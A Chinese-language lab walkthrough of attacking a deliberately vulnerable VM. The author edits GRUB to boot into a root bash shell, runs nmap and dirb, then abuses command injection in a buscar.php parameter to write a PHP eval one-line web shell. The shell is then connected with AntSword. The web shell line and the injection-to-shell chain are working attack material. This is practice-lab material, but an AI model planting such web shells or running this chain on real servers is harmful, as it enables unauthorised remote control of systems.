靶机 ip：192.168.152.155

把靶机的网络模式调成和攻击机kali一样的网络模式，我的kali是NAT模式,

在系统启动时(长按shift键)直到显示以下界面 ,我们选第二个，按回车。

继续选择第二个，这次按 e 进入编辑页面

接下来， 删除"recovery nomodeset"并在末尾添加"quiet splash rw init=/bin/bash"

按 F10 或者 ctrl+x 启动

我们 cd 到 etc 下的 network 目录中修改 interfaces 文件（将网卡信息设置为 ens33），重启靶机即可生效。）

cd etc
cd network
vim interfaces

我们使用 nmap -sS 扫描端口

发现他开启了 80 和 21 端口

我们访问一下 80 端口

发现了一个 site 目录，点击进去是一个页面

我们继续使用 dirb 查一下他有什么文件

我们挨个访问一下，assets 是一个图片目录

css 是一个文件目录

访问到 buscar.php 中发现url 框中有参数 buscar=

我们输入一个 id 参数

页面有变化

这时我们就可以写入一个一句话木马

echo '<?php eval($_POST["cmd"]);' > 123.php

我们去访问一下 123.php

访问成功，使用蚁剑连接

获得 shell